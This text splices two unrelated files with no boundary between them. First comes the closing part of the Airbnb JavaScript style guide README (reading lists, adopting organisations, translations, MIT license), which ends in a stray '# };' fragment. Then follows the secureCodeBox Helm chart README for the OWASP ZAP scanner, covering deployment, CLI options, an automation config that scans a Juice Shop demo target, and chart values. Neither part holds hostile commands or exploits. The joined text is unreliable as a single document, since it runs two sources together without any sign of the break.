- [JavaScript Patterns](https://www.amazon.com/JavaScript-Patterns-Stoyan-Stefanov/dp/0596806752) - Stoyan Stefanov
- [Pro JavaScript Design Patterns](https://www.amazon.com/JavaScript-Design-Patterns-Recipes-Problem-Solution/dp/159059908X) - Ross Harmes and Dustin Diaz
- [High Performance Web Sites: Essential Knowledge for Front-End Engineers](https://www.amazon.com/High-Performance-Web-Sites-Essential/dp/0596529309) - Steve Souders
- [Maintainable JavaScript](https://www.amazon.com/Maintainable-JavaScript-Nicholas-C-Zakas/dp/1449327680) - Nicholas C. Zakas
- [JavaScript Web Applications](https://www.amazon.com/JavaScript-Web-Applications-Alex-MacCaw/dp/144930351X) - Alex MacCaw
- [Pro JavaScript Techniques](https://www.amazon.com/Pro-JavaScript-Techniques-John-Resig/dp/1590597273) - John Resig
- [Smashing Node.js: JavaScript Everywhere](https://www.amazon.com/Smashing-Node-js-JavaScript-Everywhere-Magazine/dp/1119962595) - Guillermo Rauch
- [Secrets of the JavaScript Ninja](https://www.amazon.com/Secrets-JavaScript-Ninja-John-Resig/dp/193398869X) - John Resig and Bear Bibeault
- [Human JavaScript](http://humanjavascript.com/) - Henrik Joreteg
- [Superhero.js](http://superherojs.com/) - Kim Joar Bekkelund, Mads Mobæk, & Olav Bjorkoy
- [JSBooks](https://jsbooks.revolunet.com/) - Julien Bouquillon
- [Third Party JavaScript](https://www.manning.com/books/third-party-javascript) - Ben Vinegar and Anton Kovalyov
- [Effective JavaScript: 68 Specific Ways to Harness the Power of JavaScript](https://amzn.com/dp/0321812182) - David Herman
- [Eloquent JavaScript](https://eloquentjavascript.net/) - Marijn Haverbeke
- [You Don’t Know JS: ES6 & Beyond](https://shop.oreilly.com/product/0636920033769.do) - Kyle Simpson
**Blogs**
- [JavaScript Weekly](https://javascriptweekly.com/)
- [JavaScript, JavaScript...](https://javascriptweblog.wordpress.com/)
- [Bocoup Weblog](https://bocoup.com/weblog)
- [Adequately Good](https://www.adequatelygood.com/)
- [NCZOnline](https://www.nczonline.net/)
- [Perfection Kills](http://perfectionkills.com/)
- [Ben Alman](https://benalman.com/)
- [Dmitry Baranovskiy](http://dmitry.baranovskiy.com/)
- [nettuts](https://code.tutsplus.com/?s=javascript)
**Podcasts**
- [JavaScript Air](https://javascriptair.com/)
- [JavaScript Jabber](https://devchat.tv/js-jabber/)
**[⬆ back to top](#table-of-contents)**
## In the Wild
This is a list of organizations that are using this style guide. Send us a pull request and we'll add you to the list.
- **123erfasst**: [123erfasst/javascript](https://github.com/123erfasst/javascript)
- **4Catalyzer**: [4Catalyzer/javascript](https://github.com/4Catalyzer/javascript)
- **Aan Zee**: [AanZee/javascript](https://github.com/AanZee/javascript)
- **Airbnb**: [airbnb/javascript](https://github.com/airbnb/javascript)
- **AloPeyk**: [AloPeyk](https://github.com/AloPeyk)
- **AltSchool**: [AltSchool/javascript](https://github.com/AltSchool/javascript)
- **Apartmint**: [apartmint/javascript](https://github.com/apartmint/javascript)
- **Ascribe**: [ascribe/javascript](https://github.com/ascribe/javascript)
- **Avant**: [avantcredit/javascript](https://github.com/avantcredit/javascript)
- **Axept**: [axept/javascript](https://github.com/axept/javascript)
- **Billabong**: [billabong/javascript](https://github.com/billabong/javascript)
- **Bisk**: [bisk](https://github.com/Bisk/)
- **Bonhomme**: [bonhommeparis/javascript](https://github.com/bonhommeparis/javascript)
- **Brainshark**: [brainshark/javascript](https://github.com/brainshark/javascript)
- **CaseNine**: [CaseNine/javascript](https://github.com/CaseNine/javascript)
- **Cerner**: [Cerner](https://github.com/cerner/)
- **Chartboost**: [ChartBoost/javascript-style-guide](https://github.com/ChartBoost/javascript-style-guide)
- **Coeur d'Alene Tribe**: [www.cdatribe-nsn.gov](https://www.cdatribe-nsn.gov)
- **ComparaOnline**: [comparaonline/javascript](https://github.com/comparaonline/javascript-style-guide)
- **Compass Learning**: [compasslearning/javascript-style-guide](https://github.com/compasslearning/javascript-style-guide)
- **DailyMotion**: [dailymotion/javascript](https://github.com/dailymotion/javascript)
- **DoSomething**: [DoSomething/eslint-config](https://github.com/DoSomething/eslint-config)
- **Digitpaint** [digitpaint/javascript](https://github.com/digitpaint/javascript)
- **Drupal**: [www.drupal.org](https://git.drupalcode.org/project/drupal/blob/8.6.x/core/.eslintrc.json)
- **Ecosia**: [ecosia/javascript](https://github.com/ecosia/javascript)
- **Evernote**: [evernote/javascript-style-guide](https://github.com/evernote/javascript-style-guide)
- **Evolution Gaming**: [evolution-gaming/javascript](https://github.com/evolution-gaming/javascript)
- **EvozonJs**: [evozonjs/javascript](https://github.com/evozonjs/javascript)
- **ExactTarget**: [ExactTarget/javascript](https://github.com/ExactTarget/javascript)
- **Flexberry**: [Flexberry/javascript-style-guide](https://github.com/Flexberry/javascript-style-guide)
- **Gawker Media**: [gawkermedia](https://github.com/gawkermedia/)
- **General Electric**: [GeneralElectric/javascript](https://github.com/GeneralElectric/javascript)
- **Generation Tux**: [GenerationTux/javascript](https://github.com/generationtux/styleguide)
- **GoodData**: [gooddata/gdc-js-style](https://github.com/gooddata/gdc-js-style)
- **GreenChef**: [greenchef/javascript](https://github.com/greenchef/javascript)
- **Grooveshark**: [grooveshark/javascript](https://github.com/grooveshark/javascript)
- **Grupo-Abraxas**: [Grupo-Abraxas/javascript](https://github.com/Grupo-Abraxas/javascript)
- **Happeo**: [happeo/javascript](https://github.com/happeo/javascript)
- **Honey**: [honeyscience/javascript](https://github.com/honeyscience/javascript)
- **How About We**: [howaboutwe/javascript](https://github.com/howaboutwe/javascript-style-guide)
- **HubSpot**: [HubSpot/javascript](https://github.com/HubSpot/javascript)
- **Hyper**: [hyperoslo/javascript-playbook](https://github.com/hyperoslo/javascript-playbook/blob/master/style.md)
- **InterCity Group**: [intercitygroup/javascript-style-guide](https://github.com/intercitygroup/javascript-style-guide)
- **Jam3**: [Jam3/Javascript-Code-Conventions](https://github.com/Jam3/Javascript-Code-Conventions)
- **JSSolutions**: [JSSolutions/javascript](https://github.com/JSSolutions/javascript)
- **Kaplan Komputing**: [kaplankomputing/javascript](https://github.com/kaplankomputing/javascript)
- **KickorStick**: [kickorstick](https://github.com/kickorstick/)
- **Kinetica Solutions**: [kinetica/javascript](https://github.com/kinetica/Javascript-style-guide)
- **LEINWAND**: [LEINWAND/javascript](https://github.com/LEINWAND/javascript)
- **Lonely Planet**: [lonelyplanet/javascript](https://github.com/lonelyplanet/javascript)
- **M2GEN**: [M2GEN/javascript](https://github.com/M2GEN/javascript)
- **Mighty Spring**: [mightyspring/javascript](https://github.com/mightyspring/javascript)
- **MinnPost**: [MinnPost/javascript](https://github.com/MinnPost/javascript)
- **MitocGroup**: [MitocGroup/javascript](https://github.com/MitocGroup/javascript)
- **Muber**: [muber](https://github.com/muber/)
- **National Geographic Society**: [natgeosociety](https://github.com/natgeosociety/)
- **NullDev**: [NullDevCo/JavaScript-Styleguide](https://github.com/NullDevCo/JavaScript-Styleguide)
- **Nulogy**: [nulogy/javascript](https://github.com/nulogy/javascript)
- **Orange Hill Development**: [orangehill/javascript](https://github.com/orangehill/javascript)
- **Orion Health**: [orionhealth/javascript](https://github.com/orionhealth/javascript)
- **Peerby**: [Peerby/javascript](https://github.com/Peerby/javascript)
- **Pier 1**: [Pier1/javascript](https://github.com/pier1/javascript)
- **Qotto**: [Qotto/javascript-style-guide](https://github.com/Qotto/javascript-style-guide)
- **React**: [reactjs.org/docs/how-to-contribute.html#style-guide](https://reactjs.org/docs/how-to-contribute.html#style-guide)
- **REI**: [reidev/js-style-guide](https://github.com/rei/code-style-guides/)
- **Ripple**: [ripple/javascript-style-guide](https://github.com/ripple/javascript-style-guide)
- **Sainsbury’s Supermarkets**: [jsainsburyplc](https://github.com/jsainsburyplc)
- **Shutterfly**: [shutterfly/javascript](https://github.com/shutterfly/javascript)
- **Sourcetoad**: [sourcetoad/javascript](https://github.com/sourcetoad/javascript)
- **Springload**: [springload](https://github.com/springload/)
- **StratoDem Analytics**: [stratodem/javascript](https://github.com/stratodem/javascript)
- **SteelKiwi Development**: [steelkiwi/javascript](https://github.com/steelkiwi/javascript)
- **StudentSphere**: [studentsphere/javascript](https://github.com/studentsphere/guide-javascript)
- **SwoopApp**: [swoopapp/javascript](https://github.com/swoopapp/javascript)
- **SysGarage**: [sysgarage/javascript-style-guide](https://github.com/sysgarage/javascript-style-guide)
- **Syzygy Warsaw**: [syzygypl/javascript](https://github.com/syzygypl/javascript)
- **Target**: [target/javascript](https://github.com/target/javascript)
- **Terra**: [terra](https://github.com/cerner?utf8=%E2%9C%93&q=terra&type=&language=)
- **TheLadders**: [TheLadders/javascript](https://github.com/TheLadders/javascript)
- **The Nerdery**: [thenerdery/javascript-standards](https://github.com/thenerdery/javascript-standards)
- **Tomify**: [tomprats](https://github.com/tomprats)
- **Traitify**: [traitify/eslint-config-traitify](https://github.com/traitify/eslint-config-traitify)
- **T4R Technology**: [T4R-Technology/javascript](https://github.com/T4R-Technology/javascript)
- **UrbanSim**: [urbansim](https://github.com/urbansim/)
- **VoxFeed**: [VoxFeed/javascript-style-guide](https://github.com/VoxFeed/javascript-style-guide)
- **WeBox Studio**: [weboxstudio/javascript](https://github.com/weboxstudio/javascript)
- **Weggo**: [Weggo/javascript](https://github.com/Weggo/javascript)
- **Zillow**: [zillow/javascript](https://github.com/zillow/javascript)
- **ZocDoc**: [ZocDoc/javascript](https://github.com/ZocDoc/javascript)
**[⬆ back to top](#table-of-contents)**
## Translation
This style guide is also available in other languages:
- ![br](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Brazil.png) **Brazilian Portuguese**: [armoucar/javascript-style-guide](https://github.com/armoucar/javascript-style-guide)
- ![bg](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Bulgaria.png) **Bulgarian**: [borislavvv/javascript](https://github.com/borislavvv/javascript)
- ![ca](https://raw.githubusercontent.com/fpmweb/javascript-style-guide/master/img/catala.png) **Catalan**: [fpmweb/javascript-style-guide](https://github.com/fpmweb/javascript-style-guide)
- ![cn](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/China.png) **Chinese (Simplified)**: [lin-123/javascript](https://github.com/lin-123/javascript)
- ![tw](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Taiwan.png) **Chinese (Traditional)**: [jigsawye/javascript](https://github.com/jigsawye/javascript)
- ![fr](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/France.png) **French**: [nmussy/javascript-style-guide](https://github.com/nmussy/javascript-style-guide)
- ![de](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Germany.png) **German**: [timofurrer/javascript-style-guide](https://github.com/timofurrer/javascript-style-guide)
- ![it](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Italy.png) **Italian**: [sinkswim/javascript-style-guide](https://github.com/sinkswim/javascript-style-guide)
- ![jp](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Japan.png) **Japanese**: [mitsuruog/javascript-style-guide](https://github.com/mitsuruog/javascript-style-guide)
- ![kr](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/South-Korea.png) **Korean**: [ParkSB/javascript-style-guide](https://github.com/ParkSB/javascript-style-guide)
- ![ru](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Russia.png) **Russian**: [leonidlebedev/javascript-airbnb](https://github.com/leonidlebedev/javascript-airbnb)
- ![es](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Spain.png) **Spanish**: [paolocarrasco/javascript-style-guide](https://github.com/paolocarrasco/javascript-style-guide)
- ![th](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Thailand.png) **Thai**: [lvarayut/javascript-style-guide](https://github.com/lvarayut/javascript-style-guide)
- ![tr](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Turkey.png) **Turkish**: [eraycetinay/javascript](https://github.com/eraycetinay/javascript)
- ![ua](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Ukraine.png) **Ukrainian**: [ivanzusko/javascript](https://github.com/ivanzusko/javascript)
- ![vn](https://raw.githubusercontent.com/gosquared/flags/master/flags/flags/shiny/24/Vietnam.png) **Vietnam**: [dangkyokhoang/javascript-style-guide](https://github.com/dangkyokhoang/javascript-style-guide)
## The JavaScript Style Guide Guide
- [Reference](https://github.com/airbnb/javascript/wiki/The-JavaScript-Style-Guide-Guide)
## Chat With Us About JavaScript
- Find us on [gitter](https://gitter.im/airbnb/javascript).
## Contributors
- [View Contributors](https://github.com/airbnb/javascript/graphs/contributors)
## License
(The MIT License)
Copyright (c) 2012 Airbnb
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
'Software'), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
**[⬆ back to top](#table-of-contents)**
## Amendments
We encourage you to fork this guide and change the rules to fit your team’s style guide. Below, you may list some amendments to the style guide. This allows you to periodically update your style guide without having to deal with merge conflicts.
# };
|
---
title: "ZAP"
category: "scanner"
type: "WebApplication"
state: "released"
appVersion: "2.13.0"
usecase: "WebApp & OpenAPI Vulnerability Scanner"
---
![zap logo](https://raw.githubusercontent.com/wiki/zaproxy/zaproxy/images/zap32x32.png)
<!--
SPDX-FileCopyrightText: the secureCodeBox authors
SPDX-License-Identifier: Apache-2.0
-->
<!--
.: IMPORTANT! :.
--------------------------
This file is generated automatically with `helm-docs` based on the following template files:
- ./.helm-docs/templates.gotmpl (general template data for all charts)
- ./chart-folder/.helm-docs.gotmpl (chart specific template data)
Please be aware of that and apply your changes only within those template files instead of this file.
Otherwise your changes will be reverted/overwritten automatically due to the build process `./.github/workflows/helm-docs.yaml`
--------------------------
-->
<p align="center">
<a href="https://opensource.org/licenses/Apache-2.0"><img alt="License Apache-2.0" src="https://img.shields.io/badge/License-Apache%202.0-blue.svg"/></a>
<a href="https://github.com/secureCodeBox/secureCodeBox/releases/latest"><img alt="GitHub release (latest SemVer)" src="https://img.shields.io/github/v/release/secureCodeBox/secureCodeBox?sort=semver"/></a>
<a href="https://owasp.org/www-project-securecodebox/"><img alt="OWASP Lab Project" src="https://img.shields.io/badge/OWASP-Lab%20Project-yellow"/></a>
<a href="https://artifacthub.io/packages/search?repo=securecodebox"><img alt="Artifact HUB" src="https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/securecodebox"/></a>
<a href="https://github.com/secureCodeBox/secureCodeBox/"><img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/secureCodeBox/secureCodeBox?logo=GitHub"/></a>
<a href="https://twitter.com/securecodebox"><img alt="Twitter Follower" src="https://img.shields.io/twitter/follow/securecodebox?style=flat&color=blue&logo=twitter"/></a>
</p>
## What is OWASP ZAP?
The [OWASP Zed Attack Proxy (ZAP)][zap owasp project] is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers*. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. It's also a great tool for experienced pentesters to use for manual security testing.
To learn more about the ZAP scanner itself visit [https://www.zaproxy.org/](https://www.zaproxy.org/).
To learn more about the ZAP Automation Framework itself visit [https://www.zaproxy.org/docs/desktop/addons/automation-framework/](https://www.zaproxy.org/docs/desktop/addons/automation-framework/).
## Deployment
The zap chart can be deployed via helm:
```bash
# Install HelmChart (use -n to configure another namespace)
helm upgrade --install zap secureCodeBox/zap
```
## Scanner Configuration
The following security scan configuration example are based on the ZAP Docker Scan Scripts. By default, the secureCodeBox ZAP Helm Chart installs all four ZAP scripts: `zap-baseline`, `zap-full-scan` , `zap-api-scan` & `zap-automation-scan`. Listed below are the arguments supported by the `zap-baseline` script, which are mostly interchangeable with the other ZAP scripts (except for `zap-automation-scan`). For a more complete reference check out the [ZAP Documentation](https://www.zaproxy.org/docs/docker/) and the secureCodeBox based ZAP examples listed below.
The command line interface can be used to easily run server scans: `-t www.example.com`
```bash
Usage: zap-baseline.py -t <target> [options]
-t target target URL including the protocol, eg https://www.example.com
Options:
-h print this help message
-c config_file config file to use to INFO, IGNORE or FAIL warnings
-u config_url URL of config file to use to INFO, IGNORE or FAIL warnings
-g gen_file generate default config file (all rules set to WARN)
-m mins the number of minutes to spider for (default 1)
-r report_html file to write the full ZAP HTML report
-w report_md file to write the full ZAP Wiki (Markdown) report
-x report_xml file to write the full ZAP XML report
-J report_json file to write the full ZAP JSON document
-a include the alpha passive scan rules as well
-d show debug messages
-P specify listen port
-D delay in seconds to wait for passive scanning
-i default rules not in the config file to INFO
-I do not return failure on warning
-j use the Ajax spider in addition to the traditional one
-l level minimum level to show: PASS, IGNORE, INFO, WARN or FAIL, use with -s to hide example URLs
-n context_file context file which will be loaded prior to spidering the target
-p progress_file progress file which specifies issues that are being addressed
-s short output format - dont show PASSes or example URLs
-T max time in minutes to wait for ZAP to start and the passive scan to run
-z zap_options ZAP command line options e.g. -z "-config aaa=bbb -config ccc=ddd"
--hook path to python file that define your custom hooks
```
## ZAP Automation Scanner Configuration
The Automation Framework allows for higher flexibility in configuring ZAP scans. Its goal is the automation of the full functionality of ZAP's GUI. The configuration of the Automation Framework differs from the other three ZAP scan types. The following security scan configuration example highlights the differences for running a `zap-automation-scan`.
Of particular interest for us will be the -autorun option. `zap-automation-scan` allows for providing an automation file as a ConfigMap that defines the details of the scan. See the secureCodeBox based ZAP Automation example listed below for what such a ConfigMap would look like.
```bash
Usage: zap.sh -cmd -host <target> [options]
-t target target URL including the protocol, eg https://www.example.com
Add-on options:
-script <script> Run the specified script from commandline or load in GUI
-addoninstall <addOnId> Installs the add-on with specified ID from the ZAP Marketplace
-addoninstallall Install all available add-ons from the ZAP Marketplace
-addonuninstall <addOnId> Uninstalls the Add-on with specified ID
-addonupdate Update all changed add-ons from the ZAP Marketplace
-addonlist List all of the installed add-ons
-certload <path> Loads the Root CA certificate from the specified file name
-certpubdump <path> Dumps the Root CA public certificate into the specified file name, this is suitable for importing into browsers
-certfulldump <path> Dumps the Root CA full certificate (including the private key) into the specified file name, this is suitable for importing into ZAP
-notel Turns off telemetry calls
-hud Launches a browser configured to proxy through ZAP with the HUD enabled, for use in daemon mode
-hudurl <url> Launches a browser as per the -hud option with the specified URL
-hudbrowser <browser> Launches a browser as per the -hud option with the specified browser, supported options: Chrome, Firefox by default 'Firefox'
-openapifile <path> Imports an OpenAPI definition from the specified file name
-openapiurl <url> Imports an OpenAPI definition from the specified URL
-openapitargeturl <url> The Target URL, to override the server URL present in the OpenAPI definition. Refer to the help for supported format.
-quickurl <target url> The URL to attack, e.g. http://www.example.com
-quickout <filename> The file to write the HTML/JSON/MD/XML results to (based on the file extension)
-autorun <filename> Run the automation jobs specified in the file.
-autogenmin <filename> Generate template automation file with the key parameters.
-autogenmax <filename> Generate template automation file with all parameters.
-autogenconf <filename> Generate template automation file using the current configuration.
-graphqlfile <path> Imports a GraphQL Schema from a File
-graphqlurl <url> Imports a GraphQL Schema from a URL
-graphqlendurl <url> Sets the Endpoint URL
```
## Requirements
Kubernetes: `>=v1.11.0-0`
The secureCodeBox provides two different scanner charts (`zap`, `zap-advanced`) to automate ZAP WebApplication security scans. The first one `zap` comes with four scanTypes:
- `zap-baseline-scan`
- `zap-full-scan`
- `zap-api-scan`
- `zap-automation-scan`
The scanTypes `zap-baseline-scan`, `zap-full-scan` & `zap-api-scan` can be configured via CLI arguments which are somehow a bit limited for some advanced usecases, e.g. using custom zap scripts or configuring complex authentication settings.
That's why we introduced this `zap-advanced` scanner chart, which introduces extensive YAML configuration options for ZAP. The YAML configuration can be split in multiple files and will be merged at start.
ZAP's own Automation Framework provides similar functionality to the `zap-advanced` scanner chart and is set to displace it in the future.
## ZAP Automation Configuration
The ZAP Automation Scanner supports the use of secrets, as to not have hardcoded credentials in the scan definition.
Generate secrets using the credentials that will later be used in the scan for authentication. Supported authentication methods for the ZAP Authentication scanner are Manual, HTTP / NTLM, Form-based, JSON-based, and Script-based.
```bash
kubectl create secret generic unamesecret --from-literal='username=<USERNAME>'
kubectl create secret generic pwordsecret --from-literal='password=<PASSWORD>'
```
You can now include the secrets in the scan definition and reference them in the ConfigMap that defines the scan options.
A ZAP Automation scan using JSON-based authentication may look like this:
```yaml
apiVersion: v1
kind: ConfigMap
metadata:
name: "zap-automation-scan-config"
data:
1-automation.yaml: |-
env: # The environment, mandatory
contexts: # List of 1 or more contexts, mandatory
- name: test-config # Name to be used to refer to this context in other jobs, mandatory
urls: ["http://juiceshop.demo-targets.svc:3000"] # A mandatory list of top level urls, everything under each url will be included
includePaths:
- "http://juiceshop.demo-targets.svc:3000/.*" # An optional list of regexes to include
excludePaths:
- ".*socket\\.io.*"
- ".*\\.png"
- ".*\\.jpeg"
- ".*\\.jpg"
- ".*\\.woff"
- ".*\\.woff2"
- ".*\\.ttf"
- ".*\\.ico"
authentication:
method: "json"
parameters:
loginPageUrl: "http://juiceshop.demo-targets.svc:3000/rest/user"
loginRequestUrl: "http://juiceshop.demo-targets.svc:3000/rest/user/login"
loginRequestBody: '{"email":"${EMAIL}","password":"${PASS}"}'
verification:
method: "response"
loggedOutRegex: '\Q{"user":{}}\E'
loggedInRegex: '\Q<a href="password.jsp">\E'
users:
- name: "juiceshop-user-1"
credentials:
username: "${EMAIL}"
password: "${PASS}"
parameters:
failOnError: true # If set exit on an error
failOnWarning: false # If set exit on a warning
progressToStdout: true # If set will write job progress to stdout
jobs:
- type: passiveScan-config # Passive scan configuration
parameters:
maxAlertsPerRule: 10 # Int: Maximum number of alerts to raise per rule
scanOnlyInScope: true # Bool: Only scan URLs in scope (recommended)
- type: spider # The traditional spider - fast but doesnt handle modern apps so well
parameters:
context: test-config # String: Name of the context to spider, default: first context
user: juiceshop-user-1 # String: An optional user to use for authentication, must be defined in the env
maxDuration: 2 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited
- type: spiderAjax # The ajax spider - slower than the spider but handles modern apps well
parameters:
context: test-config # String: Name of the context to spider, default: first context
maxDuration: 2 # Int: The max time in minutes the ajax spider will be allowed to run for, default: 0 unlimited
- type: passiveScan-wait # Passive scan wait for the passive scanner to finish
parameters:
maxDuration: 10 # Int: The max time to wait for the passive scanner, default: 0 unlimited
- type: report # Report generation
parameters:
template: traditional-xml # String: The template id, default : modern
reportDir: /home/securecodebox/ # String: The directory into which the report will be written
reportFile: zap-results # String: The report file name pattern, default: [[yyyy-MM-dd]]-ZAP-Report-[[site]]
risks: # List: The risks to include in this report, default all
- high
- medium
- low
---
apiVersion: "execution.securecodebox.io/v1"
kind: Scan
metadata:
name: "zap-example-scan"
spec:
scanType: "zap-automation-scan"
parameters:
- "-autorun"
- "/home/securecodebox/scb-automation/1-automation.yaml"
volumeMounts:
- mountPath: /home/securecodebox/scb-automation/1-automation.yaml
name: zap-automation
subPath: 1-automation.yaml
volumes:
- name: zap-automation
configMap:
name: zap-automation-scan-config
env:
- name: EMAIL
valueFrom:
secretKeyRef:
name: unamesecret
key: username
- name: PASS
valueFrom:
secretKeyRef:
name: pwordsecret
key: password
```
For a complete overview of all the possible options you have for configuring a ZAP Automation scan, run
```bash
./zap.sh -cmd -autogenmax zap.yaml
```
For an overview of all required configuration options, run
```
bash ./zap.sh -cmd -autogenmin zap.yaml
```
Alternatively, have a look at the [official documentation](https://www.zaproxy.org/docs/desktop/addons/automation-framework/).
## Values
| Key | Type | Default | Description |
|-----|------|---------|-------------|
| cascadingRules.enabled | bool | `false` | Enables or disables the installation of the default cascading rules for this scanner |
| imagePullSecrets | list | `[]` | Define imagePullSecrets when a private registry is used (see: https://kubernetes.io/docs/tasks/configure-pod-container/pull-image-private-registry/) |
| parser.affinity | object | `{}` | Optional affinity settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) |
| parser.env | list | `[]` | Optional environment variables mapped into each parseJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) |
| parser.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images |
| parser.image.repository | string | `"docker.io/securecodebox/parser-zap"` | Parser image repository |
| parser.image.tag | string | defaults to the charts version | Parser image tag |
| parser.resources | object | { requests: { cpu: "200m", memory: "100Mi" }, limits: { cpu: "400m", memory: "200Mi" } } | Optional resources lets you control resource limits and requests for the parser container. See https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/ |
| parser.scopeLimiterAliases | object | `{}` | Optional finding aliases to be used in the scopeLimiter. |
| parser.tolerations | list | `[]` | Optional tolerations settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) |
| parser.ttlSecondsAfterFinished | string | `nil` | seconds after which the Kubernetes job for the parser will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ |
| scanner.activeDeadlineSeconds | string | `nil` | There are situations where you want to fail a scan Job after some amount of time. To do so, set activeDeadlineSeconds to define an active deadline (in seconds) when considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#job-termination-and-cleanup) |
| scanner.affinity | object | `{}` | Optional affinity settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) |
| scanner.backoffLimit | int | 3 | There are situations where you want to fail a scan Job after some amount of retries due to a logical error in configuration etc. To do so, set backoffLimit to specify the number of retries before considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#pod-backoff-failure-policy) |
| scanner.env | list | `[]` | Optional environment variables mapped into each scanJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) |
| scanner.envFrom | list | `[]` | Optional mount environment variables from configMaps or secrets (see: https://kubernetes.io/docs/tasks/inject-data-application/distribute-credentials-secure/#configure-all-key-value-pairs-in-a-secret-as-container-environment-variables) |
| scanner.extraContainers | list | `[]` | Optional additional Containers started with each scanJob (see: https://kubernetes.io/docs/concepts/workloads/pods/init-containers/) |
| scanner.extraVolumeMounts | list | `[{"mountPath":"/zap/wrk","name":"zap-workdir"}]` | Optional VolumeMounts mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) |
| scanner.extraVolumes | list | `[{"emptyDir":{},"name":"zap-workdir"}]` | Optional Volumes mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) |
| scanner.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images |
| scanner.image.repository | string | `"owasp/zap2docker-stable"` | Container Image to run the scan |
| scanner.image.tag | string | `nil` | defaults to the charts appVersion |
| scanner.nameAppend | string | `nil` | append a string to the default scantype name. |
| scanner.podSecurityContext | object | `{}` | Optional securityContext set on scanner pod (see: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) |
| scanner.resources | object | `{}` | CPU/memory resource requests/limits (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/, https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/) |
| scanner.securityContext | object | `{"allowPrivilegeEscalation":false,"capabilities":{"drop":["all"]},"privileged":false,"readOnlyRootFilesystem":false,"runAsNonRoot":false}` | Optional securityContext set on scanner container (see: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) |
| scanner.securityContext.allowPrivilegeEscalation | bool | `false` | Ensure that users privileges cannot be escalated |
| scanner.securityContext.capabilities.drop[0] | string | `"all"` | This drops all linux privileges from the container. |
| scanner.securityContext.privileged | bool | `false` | Ensures that the scanner container is not run in privileged mode |
| scanner.securityContext.readOnlyRootFilesystem | bool | `false` | Prevents write access to the containers file system |
| scanner.securityContext.runAsNonRoot | bool | `false` | Enforces that the scanner image is run as a non root user |
| scanner.suspend | bool | `false` | if set to true the scan job will be suspended after creation. You can then resume the job using `kubectl resume <jobname>` or using a job scheduler like kueue |
| scanner.tolerations | list | `[]` | Optional tolerations settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) |
| scanner.ttlSecondsAfterFinished | string | `nil` | seconds after which the Kubernetes job for the scanner will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ |
## License
[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
Code of secureCodeBox is licensed under the [Apache License 2.0][scb-license].
[scb-owasp]: https://www.owasp.org/index.php/OWASP_secureCodeBox
[scb-docs]: https://www.securecodebox.io/
[scb-site]: https://www.securecodebox.io/
[scb-github]: https://github.com/secureCodeBox/
[scb-twitter]: https://twitter.com/secureCodeBox
